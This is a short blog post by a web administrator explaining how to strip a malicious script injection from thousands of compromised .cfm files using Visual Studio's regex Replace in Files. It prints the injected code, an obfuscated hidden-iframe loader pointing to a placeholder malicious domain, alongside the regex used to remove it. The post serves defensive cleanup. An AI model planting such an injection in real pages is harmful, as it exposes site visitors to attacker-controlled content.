Feb 14

Recently at work I was dealing with a server-wide compromise on a web server. A specific injection was appended to over 2000 files *.cfm files. Once getting permissions in order (the root issue) I was trying to figure out how to remove the injections. We have a very strong Storage Operations team and we make backups daily, however restores tend to scare customers. Since the injections were all appended and none of the legitimate data was overwritten, it just needed to be removed.

Open Visual Studio and press ctrl+f. “Quick Replace” -> “Replace in Files”.

1

The injection we want to remove for this example is as follows:

<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://www.maliciousdomain";
var applstrna2 = ".com/CONTENT/faq.htm";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>


Notice the multiple line breaks and special characters, this is where Visual Studio regular expressions become handy.

http://msdn.microsoft.com/en-us/library/2k3te2cs(VS.80).aspx

For this situation this we need to understand how to use these expressions:

Any character   .     Matches any single character except a line break.
Zero or more     *    Matches zero or more occurrences of the preceding expression, making all possible matches.
Line break        \n   Matches a platform-independent line break. In a Replace expression, inserts a line break.
Escape             \     Matches the character that follows the backslash (\) as a literal. This allows you to find the characters used in regular expression notation, such as { and ^. For example, \^ Searches for the ^ character.

21

Here is the final search string:

\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n.*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n.*\<\/script\>

Be sure to select “Use: Regular Expressions” , then “Replace all”. If you’re on an internal network you can just use a UNC path in the “Look in:” input.

Once it completes it will tell you how many occurrences were replaced and it will actually make a log of it in your find results pane window.

Replace all "\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n .*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n .*\<\/script\>", "", Regular expressions, Find Results 1, "C:\", "*.aspx" C:\Default.aspx(32,1): Total replaced: 1 Matching files: 1 Total files searched: 1

Hosted by HostMySite.com